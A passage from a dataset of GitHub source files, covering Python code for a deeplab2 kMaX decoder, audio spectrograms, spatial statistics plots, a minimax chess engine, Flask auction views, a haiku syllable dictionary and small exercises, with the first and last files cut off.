axial_block_groups.BlockGroup,\n num_blocks=1,\n # Note that the variable 'filters' is required by BlockGroup, and thus we\n # set filters = 128 (a random value), which does not affect the dual-path\n # transformer (i.e., changing this value will have no effect here).\n filters=128,\n original_resnet_stride=1,\n original_resnet_input_stride=32,\n use_transformer_beyond_stride=16,\n # The channels of dual-path transformer is controlled by\n # (128 * transformer_expansion).\n transformer_expansion=1.0,\n activation='gelu',\n # Disable the pixel2pixel attention.\n use_axial_block=False,\n dual_path_transformer_layer_config={\n 'use_memory_self_attention': True,\n 'use_memory2pixel_feedback_attention': False,\n 'use_pixel2memory_feedback_attention': False,\n 'use_kmeans_cross_attention': True,\n })\n\n\nclass KMaXTransformerDecoder(tf.keras.Model):\n \"\"\"kMaX Transformer Decoder.\n\n The transformer decoder in the k-means Mask Transformer (kMaX) employs the\n k-means cross attention, where an argmax is operated along the cluster center\n dimension (instead of a softmax along the spatial dimension). 
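A toy sketch of that assignment step (hypothetical shapes, not this class's API):\n\n    # pixel features P: [B, HW, C]; cluster centers Q: [B, N, C]\n    # affinity = tf.einsum('bnc,bhc->bnh', Q, P)              # [B, N, HW]\n    # assignment = tf.one_hot(tf.argmax(affinity, axis=1), N)  # hard, per pixel\n\n  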
The argmax\n operation is similar to the k-means pixel-cluster assignment step (with a hard\n assignment). The cluster centers are then updated by aggregating the pixel\n features based on the pixel-cluster assignment (computed by their feature\n affinity), similar to the k-means center-update step.\n\n References:\n [1] k-means Mask Transformer, ECCV 2022.\n Qihang Yu, Huiyu Wang, Siyuan Qiao, Maxwell Collins, Yukun Zhu,\n Hartwig Adam, Alan Yuille, Liang-Chieh Chen.\n \"\"\"\n\n def __init__(self,\n name: str,\n auxiliary_predictor_func: Optional[Callable[[], tf.keras.Model]],\n norm_layer: Optional[Callable[\n [],\n tf.keras.layers.Layer]] = tf.keras.layers.BatchNormalization,\n num_blocks: Tuple[int, int, int] = (2, 2, 2),\n num_mask_slots: int = 128,\n transformer_decoder_drop_path_keep_prob: float = 1.0):\n \"\"\"Initializes a KMaXTransformerDecoder.\n\n Args:\n name: A string, the name of the model.\n auxiliary_predictor_func: A callable function that returns an\n initialization of auxiliary predictor.\n norm_layer: An optional tf.keras.layers.Layer that computes the\n normalization (default: tf.keras.layers.BatchNormalization).\n num_blocks: A list of three integers specifying number of blocks for\n each stage. The stage is counted backwards, i.e., from output stride\n 32, 16, and 8.\n num_mask_slots: An integer, the number of mask slots that will be used.\n transformer_decoder_drop_path_keep_prob: A float, the drop-path keep prob\n for transformer decoder.\n Raises:\n ValueError: If the length of num_blocks is not 3.\n \"\"\"\n super().__init__(name=name)\n\n if len(num_blocks) != 3:\n raise ValueError('Expect the length of num_blocks to be 3!')\n\n self._kmax_decoder = []\n for index, feature_output_stride in enumerate([32, 16, 8]):\n for i in range(num_blocks[index]):\n kmax_decoder_fn = transformer_decoder_block(\n name=f'kmax_transformer_decoder_os{feature_output_stride}_{i}',\n bn_layer=norm_layer,\n auxiliary_predictor_func=auxiliary_predictor_func,\n drop_path_keep_prob=transformer_decoder_drop_path_keep_prob)\n self._kmax_decoder.append(kmax_decoder_fn)\n\n self._cluster_centers = self.add_weight(\n name='cluster_centers',\n shape=(1, num_mask_slots, 256),\n initializer=tf.keras.initializers.TruncatedNormal(stddev=1.0),\n trainable=True)\n\n self._class_embedding_projection = convolutions.Conv1D(\n 256,\n 'class_embedding_projection',\n use_bias=False,\n use_bn=True,\n bn_layer=norm_layer,\n activation='gelu')\n\n self._mask_embedding_projection = convolutions.Conv1D(\n 256,\n 'mask_embedding_projection',\n use_bias=False,\n use_bn=True,\n bn_layer=norm_layer,\n activation='gelu')\n\n self._num_blocks = num_blocks\n self._num_mask_slots = num_mask_slots\n\n def _prepare_cluster_centers(self, input_tensor, training=False):\n batch_size = tf.shape(input_tensor)[0]\n cluster_centers = tf.tile(self._cluster_centers, [batch_size, 1, 1])\n return cluster_centers\n\n def call(self, endpoints, training=False):\n # Make a copy so that input argument will not be modified, per requirements\n # from exporting a saved model.\n endpoints = dict(endpoints)\n\n # Apply kMaX decoder on pixel features at output stride 32, 16, and 8\n # respectively to update the cluster centers.\n feature_dict = {\n 32: endpoints['decoder_stage1'],\n 16: endpoints['decoder_stage2'],\n 8: endpoints['decoder_stage3']}\n cluster_centers = self._prepare_cluster_centers(feature_dict[32],\n training=training)\n auxiliary_outputs = ()\n current_transformer_idx = 0\n for index, feature_output_stride in 
enumerate([32, 16, 8]):\n for _ in range(self._num_blocks[index]):\n (_, cluster_centers, auxiliary_outputs) = (\n self._kmax_decoder[current_transformer_idx](\n (feature_dict[feature_output_stride], cluster_centers,\n auxiliary_outputs), training=training))\n current_transformer_idx += 1\n\n # Project cluster centers to mask embeddings and class embeddings.\n class_embeddings = self._class_embedding_projection(\n cluster_centers, training=training)\n mask_embeddings = self._mask_embedding_projection(\n cluster_centers, training=training)\n # Prepare endpoints for predictor.\n endpoints['transformer_class_feature'] = class_embeddings\n endpoints['transformer_mask_feature'] = mask_embeddings\n endpoints['feature_panoptic'] = endpoints['decoder_output']\n endpoints['feature_semantic'] = endpoints['stage5']\n endpoints[common.PRED_AUXILIARY_OUTPUTS] = auxiliary_outputs\n\n return endpoints\n","repo_name":"google-research/deeplab2","sub_path":"model/transformer_decoder/kmax.py","file_name":"kmax.py","file_ext":"py","file_size_in_byte":6534,"program_lang":"python","lang":"en","doc_type":"code","stars":949,"dataset":"github-code","pt":"83"} +{"seq_id":"70931689871","text":"import numpy as np\nimport librosa as lr\nimport h5py\nimport time\nimport os\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport IPython.display as ipd\n\nfrom skimage.util.shape import view_as_windows\n\nPATH = '/mnt/c/svdcvt/teacher/sirius/'\nPATH1 = os.path.join(PATH, 'dataset/')\n\n\ndef to_melspec(ar, n_fft=2048):\n return lr.amplitude_to_db(lr.feature.melspectrogram(ar, n_fft=n_fft))\n\ndef file_to_segments(file, sr=22050, duration=3, step=2):\n if isinstance(file, (str)):\n file, sr = lr.load(path=file, sr=sr)\n elif isinstance(file, (np.ndarray)):\n pass\n else:\n raise ValueError()\n \n file_duration = len(file) / sr\n segm_ticks = duration * sr\n step_ticks = step * sr\n if file_duration < duration:\n segments = np.tile(file, segm_ticks // len(file) + 1)[:segm_ticks][None, :]\n else:\n segments = view_as_windows(file, window_shape=(segm_ticks, ), step=step_ticks)\n del file\n return segments\n \ndef track_to_spectrograms(track_path, duration=3, sr=22050, n_fft=2048, save_path='./dataset.hdf5'):\n '''\n Arguments:\n path: str \n list of paths to audio samples\n duration: float\n duration of segment in seconds\n sr: int\n sample rate\n n_fft: int \n parameter of stft (other parameters need to be default)\n save_path: str\n saves dataset to .hdf5 format\n \n '''\n segments = file_to_segments(track_path, sr=sr, duration=duration, step=duration)\n melspec_segments = []\n for i, segment in enumerate(segments):\n melspec_segments.append(to_melspec(segment))\n return melspec_segments","repo_name":"Jur1jo/fairywinx_bot","sub_path":"music_to_spectograms.py","file_name":"music_to_spectograms.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35113010669","text":"\"\"\"\n=========================\nDirectional LISA Plotting\n=========================\n\nA directional LISA plot can be used to examine the spatial dynamics of a process.\nBy placing a local indicator of spatial association (LISA) in a dynamic context, insights on directional biases,\nco-movements, space-time hot-spots (and cold-spots) can be generated.\n\nIn this example, we use data on state per-capita incomes for the lower 48 US states that we will first process:\n\"\"\"\n\nimport libpysal as 
lps\nimport numpy as np\nfrom giddy.directional import Rose\nf = open(lps.examples.get_path('spi_download.csv'), 'r')\nlines = f.readlines()\nf.close()\n\n\nlines = [line.strip().split(\",\") for line in lines]\nnames = [line[2] for line in lines[1:-5]]\ndata = np.array([list(map(int, line[3:])) for line in lines[1:-5]])\n\n\n#############################\n# We can omit the BEA regions and focus only on the lower 48 states\n# and place incomes on relative terms:\n\nsids = range(60)\nout = ['\"United States 3/\"',\n '\"Alaska 3/\"',\n '\"District of Columbia\"',\n '\"Hawaii 3/\"',\n '\"New England\"','\"Mideast\"',\n '\"Great Lakes\"',\n '\"Plains\"',\n '\"Southeast\"',\n '\"Southwest\"',\n '\"Rocky Mountain\"',\n '\"Far West 3/\"']\n\nsnames = [name for name in names if name not in out]\nsids = [names.index(name) for name in snames]\nstates = data[sids,:]\nus = data[0]\nyears = np.arange(1969, 2009)\nrel = states/(us*1.)\nY = rel[:, [0, -1]]\n\n###############################################################################\n# Spatial Weights\n# ---------------\n#\n# We will use a simple contiguity structure to define neighbors. The file\n# states48.gal encodes the adjacency structure of the 48 states. We read this in\n# and row-normalize the weights:\n\ngal = lps.open(lps.examples.get_path('states48.gal'))\nw = gal.read()\nw.transform = 'r'\n\n##########################################\n# Visualization\n# ==============\n#\n# The Rose class creates a circular histogram that can be used to examine the distribution\n# of LISA Vectors across segments of the histogram:\n\n\n\nr4 = Rose(Y, w, k=4)\n\n\n\n##########################################\n# LISA Vectors\n# ------------\n#\n# The Rose class contains methods to carry out inference on the circular distribution of the LISA vectors. The first approach is based on a two-sided alternative where the null is that the distribution of the vectors across the segments reflects independence in the movements of the focal unit and its spatial lag. Inference is based on random spatial permutations under the null.\n\n\n\nr4.plot_vectors() # lisa vectors\n\n\n\n\n##########################################\n# LISA Vectors Origin Standardized\n# ================================\n#\n# As the LISA vectors combine the locations of a give LISA statistic in two different time periods, it can be useful\n# to standardize the vectors to look for directional biases in the movements:\n\n\nr4.plot_origin() # origin standardized\n\n\n##########################################\n# LISA Plot\n# =========\n#\n# The Rose class contains methods to carry out inference on the circular distribution of the LISA vectors. The first approach is based on a two-sided alternative where the null is that the distribution of the vectors across the segments reflects independence in the movements of the focal unit and its spatial lag. 
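(As a quick sketch, using only the Rose attributes already shown in this example, the per-segment counts can be read off against their pseudo p-values once ``permute`` has run:\n#\n#     print(list(zip(r4.counts, r4.p)))\n#\n# )\n# 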
Inference is based on random spatial permutations under the null.\n\n\n\nr4.plot() # Polar\n\n##########################################\n# Conditional LISA Plot (Focal)\n# =============================\n#\n# Here we condition on the relative starting income of the focal units:\n\n\nr4.plot(attribute=Y[:,0]) # condition on starting relative income\n\n##########################################\n# Conditional LISA Plot (Spatial Lag)\n# ===================================\n#\n# Here we condition on the relative starting income of the\n# neighboring units:\n\n\n\nr4.plot(attribute=r4.lag[:,0]) # condition on lag of starting relative income\n\n##########################################\n# Inference\n# ==========\n#\n# The Rose class contains methods to carry out inference on the circular distribution of the LISA vectors. The first approach is based on a two-sided alternative where the null is that the distribution of the vectors across the segments reflects independence in the movements of the focal unit and its spatial lag. Inference is based on random spatial permutations under the null.\n\n\nprint(r4.cuts)\nprint(r4.counts)\nnp.random.seed(1234)\nr4.permute(permutations=999)\nprint(r4.p)\n\n\n################################################\n# Here all four sector counts are significantly different from their expectation under the null.\n# A directional test can also be implemented. Here the direction of the departure from the null due to positive co-movement of a focal unit and its spatial lag over the time period results in two general cases. For sectors in the positive quadrants (I and III), the observed counts are considered extreme if they are larger than expectation, while for the negative quadrants (II, IV) the observed counts are considered extreme if they are smaller than the expected counts under the null.\n\n\n\nr4.permute(alternative='positive', permutations=999)\nprint(r4.p)\n\n######################################\n# The expected values are:\n\n\nprint(r4.expected_perm)\n\n######################################\n# Finally, a directional alternative reflecting negative association between the movement of the focal unit and its lag has the complementary interpretation to the positive alternative: lower counts in I and III, and higher counts in II and IV relative to the null.\n\n\nr4.permute(alternative='negative', permutations=999)\nprint(r4.p)\n","repo_name":"cmg777/giddy","sub_path":"examples/plot_directional.py","file_name":"plot_directional.py","file_ext":"py","file_size_in_byte":5658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"}
{"seq_id":"37873814158","text":"import chess\nimport multiprocessing\nfrom multiprocessing import Manager, Pool\n\nboard = chess.Board()\n\ndef evaluate_board(board):\n\n    pawn_white = [\n    [0, 0, 0, 0, 0, 0, 0, 0],\n    [78, 83, 86, 73, 102, 82, 85, 90],\n    [7, 29, 21, 44, 40, 31, 44, 7],\n    [-17, 16, -2, 15, 14, 0, 15, -13],\n    [-26, 3, 10, 9, 6, 1, 0, -23],\n    [-22, 9, 5, -11, -10, -2, 3, -19],\n    [-31, 8, -7, -37, -36, -14, 3, -31],\n    [0, 0, 0, 0, 0, 0, 0, 0]]\n\n    knight_white = [\n    [-66, -53, -75, -75, -10, -55, -58, -70],\n    [-3, -6, 100, -36, 4, 62, -4, -14],\n    [10, 67, 1, 74, 73, 27, 62, -2],\n    [24, 24, 45, 37, 33, 41, 25, 17],\n    [-1, 5, 31, 21, 22, 35, 2, 0],\n    [-18, 10, 13, 22, 18, 15, 11, -14],\n    [-23, -15, 2, 0, 2, 0, -23, -20],\n    [-74, -23, -26, -24, -19, -35, -22, -69]]\n\n    bishop_white = [\n    [-59, -78, -82, -76, -23,-107, -37, -50],\n    [-11, 20, 35, -42, -39, 31, 2, -22],\n    [-9, 39, -32, 41, 52, 
-10, 28, -14],\n [25, 17, 20, 34, 26, 25, 15, 10],\n [13, 10, 17, 23, 17, 16, 0, 7],\n [14, 25, 24, 15, 8, 25, 20, 15],\n [19, 20, 11, 6, 7, 6, 20, 16],\n [-7, 2, -15, -12, -14, -15, -10, -10]]\n\n rook_white = [[35, 29, 33, 4, 37, 33, 56, 50],\n [55, 29, 56, 67, 55, 62, 34, 60],\n [19, 35, 28, 33, 45, 27, 25, 15],\n [0, 5, 16, 13, 18, -4, -9, -6],\n [-28, -35, -16, -21, -13, -29, -46, -30],\n [-42, -28, -42, -25, -25, -35, -26, -46],\n [-53, -38, -31, -26, -29, -43, -44, -53],\n [-30, -24, -18, 5, -2, -18, -31, -32]]\n\n queen_white = [[6, 1, -8,-104, 69, 24, 88, 26],\n [14, 32, 60, -10, 20, 76, 57, 24],\n [-2, 43, 32, 60, 72, 63, 43, 2],\n [1, -16, 22, 17, 25, 20, -13, -6],\n [-14, -15, -2, -5, -1, -10, -20, -22],\n [-30, -6, -13, -11, -16, -11, -16, -27],\n [-36, -18, 0, -19, -15, -15, -21, -38],\n [-39, -30, -31, -13, -31, -36, -34, -42]]\n\n king_white = [[4, 54, 47, -99, -99, 60, 83, -62],\n [-32, 10, 55, 56, 56, 55, 10, 3],\n [-62, 12, -57, 44, -67, 28, 37, -31],\n [-55, 50, 11, -4, -19, 13, 0, -49],\n [-55, -43, -52, -28, -51, -47, -8, -50],\n [-47, -42, -43, -79, -64, -32, -29, -32],\n [-4, 3, -14, -50, -57, -18, 13, 4],\n [17, 30, -3, -14, 6, -1, 40, 18]]\n\n score = 0\n for i in range(8):\n for j in range(8):\n piece = board.piece_at(i*8 + j)\n if(piece is not None):\n if piece.color == chess.WHITE:\n if piece.piece_type == chess.PAWN:\n score += 100\n score += pawn_white[7-i][j]\n elif piece.piece_type == chess.KNIGHT:\n score += 280\n score += knight_white[7-i][j]\n elif piece.piece_type == chess.BISHOP:\n score += 320\n score += bishop_white[7-i][j]\n elif piece.piece_type == chess.ROOK:\n score += 479\n score += rook_white[7-i][j]\n elif piece.piece_type == chess.QUEEN:\n score += 929\n score += queen_white[7-i][j]\n elif piece.piece_type == chess.KING:\n score += 60000\n score += king_white[7-i][j]\n\n else:\n if piece.piece_type == chess.PAWN:\n score -= 100\n score -= pawn_white[i][j]\n elif piece.piece_type == chess.KNIGHT:\n score -= 280\n score -= knight_white[i][j]\n elif piece.piece_type == chess.BISHOP:\n score -= 320\n score -= bishop_white[i][j]\n elif piece.piece_type == chess.ROOK:\n score -= 479\n score -= rook_white[i][j]\n elif piece.piece_type == chess.QUEEN:\n score -= 929\n score -= queen_white[i][j]\n elif piece.piece_type == chess.KING:\n score -= 60000\n score -= king_white[i][j]\n\n return score\n\ndef minimax(board, depth, alpha, beta, maximizing_player, cache, lock):\n key = (board.fen(), depth, maximizing_player)\n with lock:\n if key in cache:\n return cache[key]\n \n if depth == 0 or board.is_game_over():\n eval = evaluate_board(board)\n with lock:\n cache[key] = eval\n return eval\n\n legal_moves = list(board.legal_moves)\n if maximizing_player:\n max_eval = float('-inf')\n for move in legal_moves:\n board.push(move)\n eval = minimax(board, depth - 1, alpha, beta, False, cache, lock)\n board.pop()\n max_eval = max(max_eval, eval)\n alpha = max(alpha, eval)\n if beta <= alpha:\n break\n with lock:\n cache[key] = max_eval\n return max_eval\n else:\n min_eval = float('inf')\n for move in legal_moves:\n board.push(move)\n eval = minimax(board, depth - 1, alpha, beta, True, cache, lock)\n board.pop()\n min_eval = min(min_eval, eval)\n beta = min(beta, eval)\n if beta <= alpha:\n break\n with lock:\n cache[key] = min_eval\n return min_eval\n\n\ndef get_best_move(board, depth):\n maximizing_player = board.turn\n legal_moves = list(board.legal_moves)\n best_move = None\n max_eval = float('-inf')\n alpha = float('-inf')\n beta = float('inf')\n\n with 
Manager() as manager:\n        cache = manager.dict()\n        lock = manager.Lock()\n\n        with Pool() as pool:\n            results = []\n            for move in legal_moves:\n                board.push(move)\n                result = pool.apply_async(minimax, args=(board, depth - 1, alpha, beta, not maximizing_player, cache, lock))\n                board.pop()\n                results.append((move, result))\n\n            for move, result in results:\n                eval = result.get()\n                if eval > max_eval:\n                    max_eval = eval\n                    best_move = move\n                alpha = max(alpha, eval)\n    \n    return best_move\n\nwhile(True):\n    print(evaluate_board(board))\n    best_move = get_best_move(board, depth = 6)\n    print(best_move)\n    board.push(best_move)\n    print(board)\n    board.push(board.parse_san(input(\"Enter the opponent's move: \")))\n    print(board)\n","repo_name":"wojtek3/Chess-engine","sub_path":"silniczekmp2.py","file_name":"silniczekmp2.py","file_ext":"py","file_size_in_byte":6740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"42278473960","text":"from typing import Tuple, Any\n\nfrom io import BytesIO\nimport os\nimport requests\n\nfrom ....classes import page\nfrom . import chapter\n\nclass MangaDexPage(page.Page):\n    def __init__(self, number: int, chapter: 'chapter.MangaDexChapter', data: Any, server=None, file=None):\n        super().__init__(number, chapter, data)\n        self.file: str = file if file else self.data['file']\n        self.server: str = server if server else self.data['server']\n    \n    def get_image(self) -> Tuple[BytesIO, str]:\n        ext = os.path.basename(self.file).split(os.path.extsep)[-1]\n        req = requests.get(self.file_url)\n        if req.ok:\n            data = BytesIO(req.content)\n            return data, ext\n        return None, None\n    \n    @property\n    def file_url(self) -> str:\n        return f'{self.server}/data/{self.chapter.chapter_hash}/{self.file}'\n\n","repo_name":"KamS04/KReader","sub_path":"source/viewer/sources/online/mangadex/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"83"}
{"seq_id":"19835308918","text":"\"\"\"\r\n    @AUTHOR: SANCHIT GUPTA\r\n    DATE: 10/9/21\r\n    PROBLEM: Create a module named “OMG” with the functions “ValidateCreditCard” and “ALLISWELL” in it. 
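(A plausible shape for that module, purely illustrative since omg.py itself is not part of this file:\r\n\r\n    # omg.py (hypothetical sketch)\r\n    def ValidateCreditCard():\r\n        number = input(\"Enter the card number: \")\r\n        return number.isdigit() and len(number) == 16  # e.g. a plain digit/length check\r\n\r\n    def ALLISWELL(isvalid):\r\n        print(\"ALL IS WELL\" if isvalid else \"Card validation failed\")\r\n\r\n    )\r\n    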
Call these functions into\r\n another python script by importing the module “OMG”.\r\n\"\"\"\r\n\r\nimport omg\r\nisvalid = omg.ValidateCreditCard() #isvalid is a boolean variable\r\nprint(\"VALIDITY: \", isvalid)\r\n\r\nomg.ALLISWELL(isvalid)\r\n\r\n","repo_name":"Sanchitgupta910/MCA-python-programming","sub_path":"creditcard.py","file_name":"creditcard.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35341461530","text":"import pickle\n#pkl_file = 'C:/Users/Dirani/ProgrammingProjects/DeepFace_Project/database/representations_deepface.pkl'\npkl_file = r'C:\\Users\\Dirani\\ProgrammingProjects\\DeepFace_Project\\database\\frames_info_الأهل و التلاميذ و الفصحى.pkl'\n#pkl_file = '/home/youssef/PythonProjects/AI/DeepFace_Project/database1/frames_info_teta image.pkl'\n\nwith open(pkl_file, 'rb') as f:\n pkl_data = pickle.load(f)\n\nprint(type(pkl_data), len(pkl_data))\n\nprint(pkl_data[8])\n\"\"\"\ni = 0\nwhile i < len(pkl_data):\n print(i, pkl_data[i][0])\n i += 1\n\n\nperson = []\ni = -1\nfor pkl_item in pkl_data:\n i += 1\n for face in pkl_item['detected_faces']:\n name = face['most_similar']['name']\n if name != \"\": #name == \"fp\"\n person.append([i, name, pkl_item['frame_index']])\n\nprint(person)\n\"\"\"","repo_name":"diraniyoussef/deepface","sub_path":"read_pkl.py","file_name":"read_pkl.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"33951656890","text":"from flask import Blueprint, render_template, request, redirect, url_for\nfrom sqlalchemy import desc, asc\nfrom .models import auctionListing, Watchlist, Bid\nfrom flask_login import login_required, current_user\nfrom .submitFields import getURLParams, getSortOrder, getWatchlistSortOrder\nfrom datetime import datetime, timedelta\nfrom . 
import db\nbp = Blueprint('main', __name__)\n\n\n@bp.route('/') \ndef index():\n isSold = 1\n if(request.args.get('isSold')=='1'):\n isSold = 0\n # Gets a list of all auction items that are currently active\n allActives = auctionListing.query.filter_by(bid_status = isSold).order_by(desc(auctionListing.start_time))\n\n for currentItem in allActives:\n remainingTime = (currentItem.end_time - datetime.now()) # get time\n # close down auction\n if(remainingTime < timedelta(0)):\n currentItem.bid_status = 0\n db.session.commit()\n\n # If there are any URL parameters for filtering, run the getURLParams function to create a new filtering query.\n if(len(request.args)>0):\n auctionItems = eval(f\"auctionListing.query.filter_by(bid_status = {isSold}){getURLParams(request)}.order_by({getSortOrder(request)})\")\n # If not, use the normal query\n else:\n auctionItems = allActives\n # A hot item is selected by choosing the active item that has the most bids.\n hotItem = auctionListing.query.filter_by(bid_status = 1).order_by(desc(auctionListing.total_bids)).first()\n # Recently sold grabs the most recent auction with a non zero selling price\n recentlySold = auctionListing.query.filter(auctionListing.current_bid != 0).filter_by(bid_status = 0).order_by(desc(auctionListing.end_time)).first()\n \n if(isSold == 1):\n return render_template('index.html', items = auctionItems.order_by(desc(auctionListing.start_time)), hotItem = hotItem, recentlySold = recentlySold)\n else:\n return render_template('soldItems.html', items = auctionItems.order_by(desc(auctionListing.start_time)))\n\n@bp.route('/sold')\ndef sold():\n return redirect(url_for('main.index',isSold = 1))\n\n\n@bp.route('/watchlist')\n@login_required\ndef watchlist():\n # The watchlist DB is queried for all items belonging to the logged in user.\n watchlistItems = Watchlist.query.filter_by(user_id=current_user.id)\n if(len(request.args)>0):\n watchlistItems = eval(f\"Watchlist.query.filter_by(user_id=current_user.id).order_by({getWatchlistSortOrder(request)})\")\n watchlistedAuctionItems = []\n # All the watchlist items are compared againsted the auctionListing db and added to a list to be displayed.\n for item in watchlistItems:\n watchlistedAuctionItems += auctionListing.query.filter_by(id=item.item_id)\n\n return render_template('watchlist.html', items=watchlistedAuctionItems)\n\n@bp.route('/profile')\n@login_required\ndef profile():\n # All of the user's listings (completed, and active) are queried using the bid status field.\n activeUserListings = auctionListing.query.filter_by(user_id = current_user.id, bid_status=1)\n completedUserListings = auctionListing.query.filter_by(user_id = current_user.id, bid_status=0)\n\n return render_template('profile.html', myActiveListings=activeUserListings, myCompletedListings = completedUserListings)\n\n\n@bp.route('/bids')\n@login_required\ndef bids():\n bids = Bid.query.filter_by(user_id = current_user.id)\n return render_template('profileBids.html', bids = bids)","repo_name":"BlackIsBlack/teahouse-auctions","sub_path":"auction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"33010869742","text":"# Rachel Friedman - 5/11/13\n\nimport cPickle\nfrom nltk.corpus import wordnet\n\ndef genSyllableDict():\n \"\"\" Creates a dictionary consisting of number of syllables as keys and lists of words as values\"\"\"\n\n syllables = {}\n nums = [str(x) for x in range(15)]\n\n for i in 
range(0, 15):\n syllables[i] = list()\n\n f = open(\"cmudict.txt\", \"r\") # CMU dictionary: http://www.speech.cs.cmu.edu/cgi-bin/cmudict\n \n for line in f: \n count = 0\n line = line.split(' ')\n word = line[0]\n sylLst = line[1]\n\n for char in sylLst:\n if char in nums:\n count += 1\n \n if word[-1] != ')' and \"'\" not in word and wordnet.synsets(word): # no apostrophes and makes sure the word isn't a proper name\n syllables[count].append(word.lower()) \n\n return syllables\n\nsyllableDict = genSyllableDict()\ncPickle.dump(syllableDict, open(\"syllableDict.txt\", \"wb\")) # saves syllable dictionary for later use so we don't have to generate again","repo_name":"rlfriedman/HaikuGenerator","sub_path":"HaikuGen/syllableDictionary.py","file_name":"syllableDictionary.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"83"} +{"seq_id":"74357235152","text":"shows = [\"SNL\",\"Conan\",\"Talking Dead\",\"Tonight Show\"]\nshowsDict = {}\nfor i in shows:\n showsDict[shows.index(i)] = i\nprint(showsDict)\n\nprompt = input(\"\\nPlease, enter another show and its position in the list using ',': \")\nanotherShow = prompt.split(\",\")[0]\nanotherShowIndex = prompt.split(\",\")[1]\n\nshows = []\nfor i in showsDict:\n shows.append(showsDict[i])\nshows.insert(int(anotherShowIndex), anotherShow)\n\nfor i in shows:\n showsDict[shows.index(i)] = i\nprint(showsDict)\n","repo_name":"heartshapedbox/python","sub_path":"tasks/176_shows.py","file_name":"176_shows.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12589110820","text":"import os\nimport re\nfrom copy import deepcopy\nfrom pyuiuc.url import URL\n\nurl_re = re.compile(r'{}.*'.format(URL.prefix))\nendpoints = URL.endpoints\n\nget_kv = lambda l: {k:k for k in l}\n\ndef generate_valid_params():\n for i in range(len(endpoints)):\n yield endpoints[:i+1]\n\ndef generate_invalid_params():\n for i in xrange(4):\n invalid = deepcopy(endpoints)\n del invalid[i]\n yield invalid\n\ndef get_xml_body(fname='./test.xml'):\n dpth = os.path.dirname(os.path.abspath(__file__))\n pth = os.path.join(dpth, fname)\n with open(pth, 'r') as f: content = f.read()\n return content\n","repo_name":"harshays/pyuiuc","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"23883008411","text":"import numpy as np\nfrom scipy.sparse import spdiags\n\ndef spconvert(n, lam):\n \"\"\"Return the n x n C^{(lam)} to C^{(lam+1)} conversion matrix.\"\"\"\n if (lam == 0):\n diags = .5*np.ones([2, n])\n diags[0, 0] = 1\n diags[1, :] = -diags[1, :]\n S = spdiags(diags, [0, 2], n, n)\n else:\n diags = np.zeros([2, n])\n diags[0,:] = lam/(lam + np.arange(n))\n diags[1,:] = lam/(lam + np.arange(n))\n diags[0, 0] = 1\n diags[1, :] = -diags[1, :]\n S = spdiags(diags, [0, 2], n, n)\n return S","repo_name":"Hadrien-Montanelli/chebpy","sub_path":"chebpy/cheb/spconvert.py","file_name":"spconvert.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"16759770128","text":"def firstOccurence(arr,ele,start,end):\n ind =-1\n while start < end:\n mid = (start+end)//2\n if arr[mid]==ele:\n ind = mid\n end = mid -1\n elif ele None:\n super().__init__(vertexes)\n self.edges: 
list[ReflectionSegment] = []\n for i in range(len(vertexes)):\n if i == len(vertexes) - 1:\n self.edges.append(ReflectionSegment(vertexes[i], vertexes[0], reflection_coefficient))\n else:\n self.edges.append(ReflectionSegment(vertexes[i], vertexes[i+1], reflection_coefficient))\n\n @staticmethod\n def from_polygon(polygon: Polygon, reflection_coefficient: float) -> 'ReflectionPolygon':\n return ReflectionPolygon(polygon.vertexes, reflection_coefficient)\n\n\nclass RefractionPolygon(Polygon, LightTransparentMixin):\n def __init__(self, vertexes: list[Point], inner_refraction_coefficient: float,\n outer_refraction_coefficient: float = 1, *, transparensy: float = 1) -> None:\n super().__init__(vertexes)\n LightTransparentMixin.__init__(self, transparensy)\n edges: list[RefractionSegment] = []\n previous_angle = self.edges[-1].reconstruct_line().angle\n for non_optical_edge in self.edges:\n current_angle = non_optical_edge.reconstruct_line().angle\n if current_angle != 0 and previous_angle != 0:\n sample_point = Point(non_optical_edge.endpoints[0].x + .1, non_optical_edge.endpoints[0].y)\n else:\n sample_point = Point(non_optical_edge.endpoints[0].x, non_optical_edge.endpoints[0].y - .1)\n if self.is_point_inside(sample_point):\n edges.append(RefractionSegment(non_optical_edge.endpoints[0], non_optical_edge.endpoints[1],\n inner_refraction_coefficient, outer_refraction_coefficient))\n else:\n edges.append(RefractionSegment(non_optical_edge.endpoints[0], non_optical_edge.endpoints[1],\n outer_refraction_coefficient, inner_refraction_coefficient))\n self.edges: list[RefractionSegment] = edges\n self.inner_refraction_coefficient = inner_refraction_coefficient\n self.outer_refraction_coefficient = outer_refraction_coefficient\n\n @staticmethod\n def from_polygon(polygon: Polygon, inner_refraction_coefficient: float,\n outer_refraction_coefficient: float = 1) -> 'RefractionPolygon':\n return RefractionPolygon(polygon.vertexes, inner_refraction_coefficient, outer_refraction_coefficient)\n\n\nclass ReflectionCircle(Cirlce):\n def __init__(self, centre: Point, radius: float, reflection_coefficient: float = 1) -> None:\n super().__init__(centre, radius)\n 